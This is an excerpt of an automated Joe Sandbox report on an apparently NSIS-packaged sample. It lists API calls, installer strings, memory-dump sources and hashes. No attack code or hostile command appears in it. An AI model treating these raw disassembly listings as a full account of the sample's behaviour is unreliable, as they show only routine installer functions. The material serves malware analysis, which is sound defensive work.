                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                            • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                            • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                            • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                            • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                            • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                            • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                            • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                            • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                            • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                            • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                            • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                            • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                            • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                            • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                            • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B018,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                            • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                            • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                            • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                            • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B018,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                            • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                            • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                            • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                            • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                            • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                            • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                            • String ID: f
                                                                                                                                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                            • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                            • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00016000,00000064,000DB817), ref: 00403295
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                            • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                            • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                            • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                            • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                            • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                            • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                            • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                            • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                            • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(0057E8A0), ref: 00402387
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                            • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                                                                                                                                                                                                                                            • API String ID: 1459762280-1711415406
                                                                                                                                                                                                                                                                                            • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                            • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                            • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
